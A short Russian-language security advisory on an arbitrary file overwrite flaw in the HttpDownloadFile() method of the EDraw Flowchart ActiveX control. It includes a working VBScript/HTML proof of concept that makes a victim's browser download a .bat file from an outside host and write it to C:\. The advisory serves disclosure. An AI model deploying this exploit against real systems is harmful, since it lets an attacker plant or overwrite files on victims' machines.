Программа: EDraw Flowchart ActiveX Control 2.x

Найденная уязвимость позволяет перезаписать произвольные файлы на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в EDIMAGE.EDImageCtrl.1 ActiveX компоненте (EDImage.ocx) в методе "HttpDownloadFile()". Атакующий может перезаписать произвольные файлы на целевой системе.

Пример:

<object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
On Error Resume Next
test.HttpDownloadFile "http://www.shinnai.altervista.org/shinnai.bat", "c:\shinnai.bat"
MsgBox("Exploit completed!")
End Sub
</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии